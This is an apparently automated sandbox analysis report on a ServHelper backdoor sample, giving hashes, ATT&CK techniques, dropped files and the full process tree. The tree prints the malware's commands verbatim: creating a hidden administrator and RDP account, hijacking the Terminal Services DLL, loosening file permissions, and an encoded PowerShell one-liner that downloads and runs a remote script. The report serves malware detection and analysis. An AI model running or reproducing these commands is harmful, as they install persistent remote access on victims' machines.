servhelper | 266562d82899806c0eafc3ca72216e78d41403dd24effebd31d7635922ba96ce

Analysis

max time kernel
125s
max time network
126s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
01-02-2024 22:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

87dd0632a95ca24443f8c6363bc055e6.exe
Size

5.9MB
MD5

87dd0632a95ca24443f8c6363bc055e6
SHA1

423785b67d20f4f5056ff6d9e34fda3c72a03bd4
SHA256

266562d82899806c0eafc3ca72216e78d41403dd24effebd31d7635922ba96ce
SHA512

c51d180cca074540f5ca9186e60509cfdb1c7e1a8651e691eac585df9f8352e256cedb86a4a340e0e8f5b1ed6d73ff270d92424259539c0c4c02a7048f2a75e2
SSDEEP

49152:uM+J9Grb/TkvO90dL3BmAFd4A64nsfJte35ke4/Dirx5WgzPpvYhWQ2duQNH9AT:uM++eamAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	2600	powershell.exe
8	2600	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
2100	icacls.exe
2072	icacls.exe
2404	icacls.exe
2068	icacls.exe
2056	icacls.exe
3008	icacls.exe
3012	icacls.exe
1724	takeown.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

pid	Process
304	Process not Found
304	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1724	takeown.exe
2100	icacls.exe
2072	icacls.exe
2404	icacls.exe
2068	icacls.exe
2056	icacls.exe
3008	icacls.exe
3012	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000b0000000152c7-105.dat	upx
behavioral1/files/0x000a0000000153c7-106.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0758CNXB6GLI3XTA2H66.temp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2572	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 500ad6c46055da01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2280	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2872	powershell.exe
2656	powershell.exe
2968	powershell.exe
2036	powershell.exe
2872	powershell.exe
2872	powershell.exe
2872	powershell.exe
2600	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

pid	Process
464	Process not Found
304	Process not Found
304	Process not Found
304	Process not Found
304	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	1728	87dd0632a95ca24443f8c6363bc055e6.exe
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeRestorePrivilege	2072	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2572	WMIC.exe
Token: SeAuditPrivilege	2572	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2572	WMIC.exe
Token: SeAuditPrivilege	2572	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2732	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2732	WMIC.exe
Token: SeAuditPrivilege	2732	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2732	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2732	WMIC.exe
Token: SeAuditPrivilege	2732	WMIC.exe
Token: SeDebugPrivilege	2600	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1728 wrote to memory of 2872	1728	87dd0632a95ca24443f8c6363bc055e6.exe	29
PID 1728 wrote to memory of 2872	1728	87dd0632a95ca24443f8c6363bc055e6.exe	29
PID 1728 wrote to memory of 2872	1728	87dd0632a95ca24443f8c6363bc055e6.exe	29
PID 2872 wrote to memory of 2780	2872	powershell.exe	31
PID 2872 wrote to memory of 2780	2872	powershell.exe	31
PID 2872 wrote to memory of 2780	2872	powershell.exe	31
PID 2780 wrote to memory of 2600	2780	csc.exe	32
PID 2780 wrote to memory of 2600	2780	csc.exe	32
PID 2780 wrote to memory of 2600	2780	csc.exe	32
PID 2872 wrote to memory of 2656	2872	powershell.exe	34
PID 2872 wrote to memory of 2656	2872	powershell.exe	34
PID 2872 wrote to memory of 2656	2872	powershell.exe	34
PID 2872 wrote to memory of 2968	2872	powershell.exe	36
PID 2872 wrote to memory of 2968	2872	powershell.exe	36
PID 2872 wrote to memory of 2968	2872	powershell.exe	36
PID 2872 wrote to memory of 2036	2872	powershell.exe	37
PID 2872 wrote to memory of 2036	2872	powershell.exe	37
PID 2872 wrote to memory of 2036	2872	powershell.exe	37
PID 2872 wrote to memory of 1724	2872	powershell.exe	39
PID 2872 wrote to memory of 1724	2872	powershell.exe	39
PID 2872 wrote to memory of 1724	2872	powershell.exe	39
PID 2872 wrote to memory of 2100	2872	powershell.exe	40
PID 2872 wrote to memory of 2100	2872	powershell.exe	40
PID 2872 wrote to memory of 2100	2872	powershell.exe	40
PID 2872 wrote to memory of 2072	2872	powershell.exe	41
PID 2872 wrote to memory of 2072	2872	powershell.exe	41
PID 2872 wrote to memory of 2072	2872	powershell.exe	41
PID 2872 wrote to memory of 2404	2872	powershell.exe	42
PID 2872 wrote to memory of 2404	2872	powershell.exe	42
PID 2872 wrote to memory of 2404	2872	powershell.exe	42
PID 2872 wrote to memory of 2068	2872	powershell.exe	43
PID 2872 wrote to memory of 2068	2872	powershell.exe	43
PID 2872 wrote to memory of 2068	2872	powershell.exe	43
PID 2872 wrote to memory of 2056	2872	powershell.exe	44
PID 2872 wrote to memory of 2056	2872	powershell.exe	44
PID 2872 wrote to memory of 2056	2872	powershell.exe	44
PID 2872 wrote to memory of 3008	2872	powershell.exe	45
PID 2872 wrote to memory of 3008	2872	powershell.exe	45
PID 2872 wrote to memory of 3008	2872	powershell.exe	45
PID 2872 wrote to memory of 3012	2872	powershell.exe	46
PID 2872 wrote to memory of 3012	2872	powershell.exe	46
PID 2872 wrote to memory of 3012	2872	powershell.exe	46
PID 2872 wrote to memory of 2972	2872	powershell.exe	47
PID 2872 wrote to memory of 2972	2872	powershell.exe	47
PID 2872 wrote to memory of 2972	2872	powershell.exe	47
PID 2872 wrote to memory of 2280	2872	powershell.exe	48
PID 2872 wrote to memory of 2280	2872	powershell.exe	48
PID 2872 wrote to memory of 2280	2872	powershell.exe	48
PID 2872 wrote to memory of 2332	2872	powershell.exe	49
PID 2872 wrote to memory of 2332	2872	powershell.exe	49
PID 2872 wrote to memory of 2332	2872	powershell.exe	49
PID 2872 wrote to memory of 1816	2872	powershell.exe	50
PID 2872 wrote to memory of 1816	2872	powershell.exe	50
PID 2872 wrote to memory of 1816	2872	powershell.exe	50
PID 1816 wrote to memory of 2076	1816	net.exe	51
PID 1816 wrote to memory of 2076	1816	net.exe	51
PID 1816 wrote to memory of 2076	1816	net.exe	51
PID 2872 wrote to memory of 2092	2872	powershell.exe	52
PID 2872 wrote to memory of 2092	2872	powershell.exe	52
PID 2872 wrote to memory of 2092	2872	powershell.exe	52
PID 2092 wrote to memory of 2480	2092	cmd.exe	53
PID 2092 wrote to memory of 2480	2092	cmd.exe	53
PID 2092 wrote to memory of 2480	2092	cmd.exe	53
PID 2480 wrote to memory of 2376	2480	cmd.exe	54

C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe
"C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2872
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jdzra8js.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5311.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5310.tmp"
      4⤵
      PID:2600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2036
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1724
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2100
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2072
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2404
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2068
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2056
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3008
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3012
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2972
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:2280
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2332
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1816
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2076
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2092
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2480
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:2376
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1876
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:2496
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:692
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:1028
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:860
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2676
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:580

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:940
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:1708

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 1C08UTJt /add
1⤵
PID:312
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 1C08UTJt /add
  2⤵
  PID:1980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 1C08UTJt /add
    3⤵
    PID:1092

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:908
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:1536

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" JUBFGPHD$ /ADD
1⤵
PID:2524
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" JUBFGPHD$ /ADD
  2⤵
  PID:2552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JUBFGPHD$ /ADD
    3⤵
    PID:856

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:804
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:1740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2108

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 1C08UTJt
1⤵
PID:1340
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 1C08UTJt
  2⤵
  PID:1600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 1C08UTJt
    3⤵
    PID:1612

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2796
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2572

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2868
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2732

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2472
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2624
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES5311.tmp

Filesize
1KB

MD5
7038dd05921629ca56de2506f9b6f45f

SHA1
0a9d0ae070f3a6d3e12fd554c62ce4ddfc8568c1

SHA256
1ab34327b8acd90c10f8d2503102d375e548f8cdc49da407c401c41d3e39c702

SHA512
0e777499e584f85e0df749bcafaa19aa4ff14016d4c7f002163f2dfdcc4543ef85f47624752a5e50feb55acc5e3db4764cb68d82301d8ff9bb445f6ba398b63d

Download Submit
C:\Users\Admin\AppData\Local\Temp\jdzra8js.dll

Filesize
3KB

MD5
5689a09981e26e86f4c04c5b2ddac266

SHA1
f99991bd1c9e1f1e2ec8a66bb700fe372ca5392a

SHA256
3f0ac78a7dfcc113a0e8537d68e1640efb9c0c27dd1e4de57eb1e1225d3ef6b5

SHA512
c288fa4f700c96c55b9a7aafdbfbbff081446ed6b1424ef5d5255e051c4625f29b103477c3a02fccde58825970fb03576155de27bfc6f7d508aedf5c005d8577

Download Submit
C:\Users\Admin\AppData\Local\Temp\jdzra8js.pdb

Filesize
7KB

MD5
3b7bdf351377c81661e101091c3240be

SHA1
bb1555e530fb4ab6aa46c8ad8b9e0d8496873c09

SHA256
99697b0f2a63321d1b02f87ade50692334160d92c5b4bbae57a0bb893cee3566

SHA512
f1550b1842ac095362a08c0d98c4bef07d57a6b7c6bd0e1fcc0711dbdf5139be29c82f119f986ac09b0f331595d17b1de6d873c2665fb92c357e8c07e8472102

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
268KB

MD5
f79aab1dbc40ef6ee6ea9dc436b055f5

SHA1
18191470758396e4a7d55edd4512372092179ac5

SHA256
0d438d4405547236ad0a4a9a65fed580805cee13dc9240e02c5351f7e75d0bea

SHA512
aa3f6e828b71f69a79cabf99cd9076da13179a660e07855e2c5541a416c5e7af45950cd9e8a562612b869c8609edfa7f7fa38d9457cd160eae0990c24c38a34f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J6AO16UNDWBMBAYCEN2K.temp

Filesize
7KB

MD5
6d15f944702570465443dda10d6f12cb

SHA1
8e1a375198f71e6dadce9238628882610af712c0

SHA256
938b980c63818655dd36a07102ad7561dc46c6238215a0974e27ce301c2e5664

SHA512
13155107ed2a14cbbc94c5a0800224eab881ac052d48f996017104bf355c839c3865a111aa9b1aa6a06ae3de6eeb689ad85d8d05dac1421e06a6ec093297735c

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC5310.tmp

Filesize
652B

MD5
1bfa5940a81d446a2606923545dc623b

SHA1
d228a214540b03139919ff99861446584fc67c88

SHA256
30d0e454af188fab9c0698af7ecc6b832fff115e5edd569d0a038ac8133cc8b5

SHA512
f3e26f8f735258787baf823e84268f5f480d51fd60c16accb38bd02732826f2ae7773cbe5e25ca73623ac124494e099f1bf6e1817be1fc6eb3f91eeae640ef04

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jdzra8js.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jdzra8js.cmdline

Filesize
309B

MD5
dade2e05a9b9eda94a5d48fd3e49186f

SHA1
3fcdaa12c37db884f8046cd4a9532113b83f7c20

SHA256
087dc04cf5635cba8bf661dfe26bc1ba8c5f3d4100076ad295b813dadbfa14d2

SHA512
fa3c11d2e4b70188b92fc88cce81f40c3fafb705e28d4016963710adabafe028d11ce92d828ff09fcaf85fb4830a36a161c6f2f7ef7a37a46624b33de70b7ac4

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
3a434e30924f88a47fa7fc31e1821106

SHA1
b0d245fb30c2b311a2cdf7998c5109a2151cf5a4

SHA256
c1908713db3a7c8fa0dda2f4a332b00b7082910a08704d4b37b26f39f4712b28

SHA512
74c0a5382a725c78db73b9dcc71445747b05171dda27c21d6688800323fb3daf365d6ce05259415db7e7504f42e401a2535a25eefa49988c605ae2853413e84e

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
c174d5f4b03f158ed3c3ac6579bc9d9f

SHA1
9a3f5c59cdcefe0097accab914e1896030e40e62

SHA256
7ed9b5536d19ad840881d068719dbc95da230bf00ba647bf1340bc5666daf2c7

SHA512
8ebd5f4a064c960eaaf0d5be4fe1463aa85e092bf4a3f81d05bb14df6e5400c80a5018a1c2a0d94f4618ce032b41567e66d0f328b443c13e09ac9e0110004f17

Download Submit
memory/1728-47-0x0000000041190000-0x0000000041210000-memory.dmp

Filesize
512KB

Download
memory/1728-0-0x0000000041630000-0x0000000041A56000-memory.dmp

Filesize
4.1MB

Download
memory/1728-53-0x0000000041190000-0x0000000041210000-memory.dmp

Filesize
512KB

Download
memory/1728-68-0x0000000041190000-0x0000000041210000-memory.dmp

Filesize
512KB

Download
memory/1728-25-0x000007FEF5BC0000-0x000007FEF65AC000-memory.dmp

Filesize
9.9MB

Download
memory/1728-63-0x0000000041190000-0x0000000041210000-memory.dmp

Filesize
512KB

Download
memory/1728-4-0x0000000041190000-0x0000000041210000-memory.dmp

Filesize
512KB

Download
memory/1728-3-0x0000000041190000-0x0000000041210000-memory.dmp

Filesize
512KB

Download
memory/1728-2-0x0000000041190000-0x0000000041210000-memory.dmp

Filesize
512KB

Download
memory/1728-1-0x000007FEF5BC0000-0x000007FEF65AC000-memory.dmp

Filesize
9.9MB

Download
memory/2036-84-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/2036-78-0x000007FEEDA80000-0x000007FEEE41D000-memory.dmp

Filesize
9.6MB

Download
memory/2036-85-0x000007FEEDA80000-0x000007FEEE41D000-memory.dmp

Filesize
9.6MB

Download
memory/2036-86-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/2036-87-0x000000000284C000-0x00000000028B3000-memory.dmp

Filesize
412KB

Download
memory/2036-83-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/2600-116-0x00000000010F0000-0x0000000001170000-memory.dmp

Filesize
512KB

Download
memory/2600-115-0x00000000010F0000-0x0000000001170000-memory.dmp

Filesize
512KB

Download
memory/2600-119-0x00000000010F0000-0x0000000001170000-memory.dmp

Filesize
512KB

Download
memory/2600-120-0x000007FEEDA80000-0x000007FEEE41D000-memory.dmp

Filesize
9.6MB

Download
memory/2600-117-0x00000000010F0000-0x0000000001170000-memory.dmp

Filesize
512KB

Download
memory/2600-112-0x000007FEEDA80000-0x000007FEEE41D000-memory.dmp

Filesize
9.6MB

Download
memory/2600-113-0x00000000010F0000-0x0000000001170000-memory.dmp

